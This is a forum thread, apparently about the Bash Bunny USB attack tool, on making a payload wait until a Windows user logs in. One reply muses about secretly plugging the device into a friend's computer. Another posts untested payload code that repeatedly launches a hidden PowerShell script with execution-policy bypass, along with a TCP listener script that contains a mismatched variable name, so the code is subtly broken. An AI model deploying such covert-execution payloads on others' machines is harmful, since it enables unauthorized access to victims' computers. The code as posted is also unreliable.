Jump to content

Wait For Windows Logon


EthanL
 Share

Recommended Posts

Hmm, you mean you want to brute force the login and then fire the payload? Or do you want to secretly plug in the bunny and wait for your friend to login and then fire the payload?

Tbh, I dunno how to do that, but i'm sure that there is a way.

 

Link to comment
Share on other sites

  • 1 month later...

You could set attackmodes to HID and Ethernet and have a payload that opens something you can connect to. While you can't connect, you wait.

 

Not tested code (payload.txt):

LED SETUP

ATTACKMODE HID STORAGE RNDIS_ETHERNET 0xF000/0xFF02

GET SWITCH_POSITION
GET TARGET_IP

# Wait till connection to socket server was possible (here it waits that the user logs in)
while ! nc -G 2 -z $TARGET_IP 8337; do
    sleep 0.1
    # Try to start socket server on client
    RUN WIN powershell -windowstyle hidden -ep bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\server.ps1')"
done

LED ATTACK
# Looks like user is logged in, start your payload:
ATTACKMODE HID



LED FINISH

 

server.ps:

$ep = new-object System.Net.IPEndPoint ([system.net.ipaddress]::any, 8337)
$listener = new-object System.Net.Sockets.TcpListener $endpoint
$listener.start()
$client = $listener.AcceptTcpClient()

 

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...